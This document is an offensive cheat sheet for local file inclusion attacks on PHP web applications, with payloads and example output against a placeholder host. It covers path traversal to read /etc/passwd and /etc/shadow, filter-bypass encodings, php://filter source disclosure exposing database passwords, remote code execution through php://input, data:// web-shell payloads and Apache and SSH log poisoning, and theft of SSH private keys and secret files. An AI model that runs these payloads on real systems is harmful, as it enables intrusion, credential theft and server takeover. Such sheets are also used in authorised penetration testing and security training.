LOCAL FILE INCLUSION (LFI)

Basic LFI test

Path traversal — Confirm LFI exists

http://$IP/page.php?file=../../../etc/passwd
Example Output
http://10.10.10.5/page.php?file=../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin
www-data:x:33:33:www-data:/var/www
admin:x:1000:1000::/home/admin:/bin/bash
(LFI CONFIRMED)

Null byte bypass (old PHP)

PHP < 5.3.4 — Bypass extension append

http://$IP/page.php?file=../../../etc/passwd%00
Example Output
http://10.10.10.5/page.php?file=../../../etc/passwd%00

Code appends .php: include($_GET['file'] . '.php');
Null byte terminates string early in PHP < 5.3.4
Result: reads /etc/passwd instead of /etc/passwd.php

Double encoding

Bypass basic filters — URL encode twice

http://$IP/page.php?file=%252e%252e%252f%252e%252e%252fetc/passwd
Example Output
http://10.10.10.5/page.php?file=%252e%252e%252f%252e%252e%252fetc/passwd

%25 = %, so %252e = %2e = .
Server decodes twice: %252e%252e%252f -> ../ 
Bypasses WAF/filter that checks for ../

PHP wrapper - base64 read

Read PHP source code — See credentials in config

http://$IP/page.php?file=php://filter/convert.base64-encode/resource=config.php
Example Output
http://10.10.10.5/page.php?file=php://filter/convert.base64-encode/resource=config.php

PD9waHAKJGRiX2hvc3QgPSAnbG9jYWxob3N0JzsK...

base64 -d:
<?php
$db_host = 'localhost';
$db_user = 'admin';
$db_pass = 'SuperSecret123';

PHP wrapper - command exec

RCE via php://input — Direct command execution

curl http://$IP/page.php?file=php://input -d '<?php system("id"); ?>'
Example Output
curl http://10.10.10.5/page.php?file=php://input -d '<?php system("id"); ?>'

uid=33(www-data) gid=33(www-data) groups=33(www-data)
(RCE CONFIRMED via php://input)

PHP data wrapper

RCE via data:// — base64 of <?php system($_GET['cmd']);?>

http://$IP/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
Example Output
http://10.10.10.5/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id

base64 decodes to: <?php system($_GET['cmd']);?>
Response: uid=33(www-data)
(RCE via data:// wrapper)

Log poisoning (Apache)

Inject PHP into logs, include log — RCE via log file

curl -A '<?php system($_GET["cmd"]); ?>' http://$IP
then: http://$IP/page.php?file=/var/log/apache2/access.log&cmd=id
Example Output
Step 1: curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.10.5
Step 2: http://10.10.10.5/page.php?file=/var/log/apache2/access.log&cmd=id

... uid=33(www-data) gid=33(www-data) ...
(RCE via log poisoning)

Log poisoning (SSH)

Inject PHP via SSH username — Alternative log poisoning

ssh '<?php system($_GET["cmd"]); ?>'@$IP
then include /var/log/auth.log
Example Output
ssh '<?php system($_GET["cmd"]); ?>'@10.10.10.5
Permission denied

But PHP code is now in /var/log/auth.log
http://10.10.10.5/page.php?file=/var/log/auth.log&cmd=id
uid=33(www-data)
(RCE via SSH log poisoning)

Read SSH keys

Steal private keys — SSH access

http://$IP/page.php?file=../../../home/<user>/.ssh/id_rsa
Example Output
http://10.10.10.5/page.php?file=../../../home/admin/.ssh/id_rsa

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA...
-----END RSA PRIVATE KEY-----

Save to file, chmod 600, ssh -i id_rsa admin@target
(LFI to SSH key = instant foothold)

Read /etc/shadow (if root)

Password hashes — Crack with hashcat/john

http://$IP/page.php?file=../../../etc/shadow
Example Output
http://10.10.10.5/page.php?file=../../../etc/shadow

root:$6$abc123$LongHashHere:19000:0:99999:7:::
admin:$6$def456$AnotherHash:19000:0:99999:7:::
(Copy hashes, crack with hashcat -m 1800)

Common files to read

Sensitive file targets — Creds, users, config

/etc/passwd
/etc/shadow
/etc/hosts
/home/<user>/.bash_history
/proc/self/environ
/var/www/html/config.php
/var/www/html/.htpasswd
Example Output
/etc/passwd -> usernames
/etc/shadow -> password hashes (if readable)
/home/user/.ssh/id_rsa -> SSH private key
/var/www/html/config.php -> DB credentials
/proc/self/environ -> environment variables with secrets
~/.bash_history -> command history with passwords

Windows LFI paths

Windows file targets — Windows path format

..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\win.ini
..\..\..\inetpub\wwwroot\web.config
Example Output
..\..\..\windows\system32\drivers\etc\hosts
 -> 127.0.0.1 localhost
..\..\..\inetpub\wwwroot\web.config
 -> <connectionStrings>Password=DBp@ss</connectionStrings>
..\..\..\windows\win.ini
 -> [fonts] (confirms LFI on Windows)